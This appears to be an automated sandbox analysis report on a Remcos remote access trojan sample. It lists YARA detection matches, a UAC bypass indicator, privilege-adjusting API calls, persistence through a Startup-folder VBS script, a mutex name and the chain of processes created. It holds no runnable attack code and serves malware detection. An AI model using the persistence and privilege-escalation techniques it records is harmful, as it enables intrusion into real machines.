                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@8/13@0/1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBA06A GetLastError,FormatMessageW,0_2_00BBA06A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA81CB AdjustTokenPrivileges,CloseHandle,0_2_00BA81CB
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00BA87E1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_00416AB7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007181CB AdjustTokenPrivileges,CloseHandle,2_2_007181CB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_007187E1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_00416AB7
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BBB3FB
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BCEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00BCEE0D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00BC83BB
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B54E89
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00419BC4
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeFile created: C:\Users\user\AppData\Local\obtenebrateJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeFile created: C:\Users\user\AppData\Local\Temp\aut7743.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: l1QC9H0SNR.exeVirustotal: Detection: 68%
                    Source: l1QC9H0SNR.exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeFile read: C:\Users\user\Desktop\l1QC9H0SNR.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\l1QC9H0SNR.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00CB2A60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00CB2A60
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B78945 push ecx; ret 0_2_00B78958
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004567E0 push eax; ret 2_2_004567FE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0045B9DD push esi; ret 2_2_0045B9E6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00455EAF push ecx; ret 2_2_00455EC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00433FF6 push ecx; ret 2_2_00434009
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006CC4C4 push A3006CBAh; retn 006Ch2_2_006CC50D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E8945 push ecx; ret 2_2_006E8958
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C2F12 push es; retf 2_2_006C2F13
